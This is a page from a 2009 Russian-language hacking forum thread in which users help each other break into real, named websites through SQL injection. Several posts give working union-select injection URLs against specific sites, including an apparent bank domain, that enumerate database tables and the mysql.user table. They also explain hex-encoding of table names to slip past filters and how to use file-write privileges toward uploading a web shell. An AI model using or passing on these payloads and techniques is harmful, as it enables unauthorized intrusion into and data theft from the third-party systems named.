ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 471 из 1393 « Первая < 371421461 467 468 469 470 471 472 473 474 475 481521571971 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #4701  
Старый 16.01.2009, 21:15
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940

Репутация: 2362
По умолчанию
Цитата:
Сообщение от geforce  
помогите разобраться!
вот раскрутил скулу:
http://15rus.ru/txt.php?cat=-3+union+select+0,table_name,2,3,4,5,6,7,8+from+inf ormation_schema.tables/**/
хочу залить shell через форум!
http://15rus.ru/forum/

Не могу понять где здесь таблицы форума???
По форуму видно, что это phpbb. Какая версия я хз, с этим форумом мало знаком. Вот 3 таблицы:
http://15rus.ru/txt.php?cat=-3+union+select+0,table_name,2,3,4,5,6,7,8+from+inf ormation_schema.tables+where+table_name+like+0x257 068706262257573657273--
какая-то из них нужная.
зы: админы того сайта просто ппц - кучу софта понаставили, помойка просто)
 

  #4702  
Старый 16.01.2009, 21:42
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию
Цитата:
Сообщение от prescott  
используй HEX для кодирования имен таблиц. То есть у себя на компе делаешь
Код:
SELECT HEX('tablename')
и результат подставляешь в запрос, не забыв подставить 0x в начало.. Получится чтото вроде 0x35E45F337D
или же просто используете php функцию =)

echo "0x".bin2hex("что надо захекстить");
 

  #4703  
Старый 16.01.2009, 21:44
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию
1. Есть туча сайтов, которые хексят.
2. Вы вообще ссылку смотрели?
3. Есть табла mysql.user.. но...
 

  #4704  
Старый 16.01.2009, 21:58
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
MirA
Забавно, действительно фильтрация "_"
Есть очень большая вероятность того, что user под которым работает база, file_priv=Y
http://www.rncb.ru/print_view.php?id=450&fpath=-2+union+select+1,2,3,UNHEX(HEX(user())),5,6,7,8,9, 10,11,12,13+from+mysql.user+--+
root@localhost

Прочитать файлы мы не сможем, т.к LOAD_FILE, и посмотреть тоже , т.к file_priv, а вот записать ...

Тоесть ищем папку на запись, и пробуем

PS
prescott,wildshaman Зачем вообще это писать?
 

  #4705  
Старый 16.01.2009, 22:57
MirA
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513

Репутация: 52
Отправить сообщение для MirA с помощью ICQ
По умолчанию
Скажите что за ошибка 1 - Can't create/write to file '/home/localhost/www/1.txt' (Errcode: 2)
з.ы. в гугл не посылать,парсил)
 

  #4706  
Старый 16.01.2009, 23:01
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию
"Errcode 2" означает, что папка не существует.

Путь сам что-ли придумывал? ^^
Последний раз редактировалось R1dex; 16.01.2009 в 23:10..
 

  #4707  
Старый 16.01.2009, 23:06
_evgeniy_
Новичок
Регистрация: 07.09.2008
Сообщений: 26
Провел на форуме:
430982

Репутация: 26
По умолчанию
Цитата:
Сообщение от MirA  
Скажите что за ошибка 1 - Can't create/write to file '/home/localhost/www/1.txt' (Errcode: 2)
з.ы. в гугл не посылать,парсил)
нет прав на запись или путь не правильный
 

  #4708  
Старый 16.01.2009, 23:07
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию
Нет прав - это "Errcode: 13"
Последний раз редактировалось R1dex; 16.01.2009 в 23:10..
 

  #4709  
Старый 16.01.2009, 23:26
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию
Помогите пожалуйста разобраться, вот нашел иньекцию http://www.rfrap.ru/site/index.php?p=16;'
при попытке подобрать количество полей вылезает
Цитата:
Не могу выполнить запрос к БД1syntax error near '' at line 1
подозреваю, что это 3 версия мускуля и похоже blind SQL-injection, а так вообще хз, просто я никогда не встречался с этим....
 

  #4710  
Старый 16.01.2009, 23:27
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию
че за фигня?) в httpd.conf прописано DocumentRoot "/usr/local/apache/htdocs"
а в /usr/local/apache/htdocs файлы index.html на разных языках и папка manual. походу это от установки апача но самого сайта нет(( как так?)
 
 
Страница 471 из 1393 « Первая < 371421461 467 468 469 470 471 472 473 474 475 481521571971 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ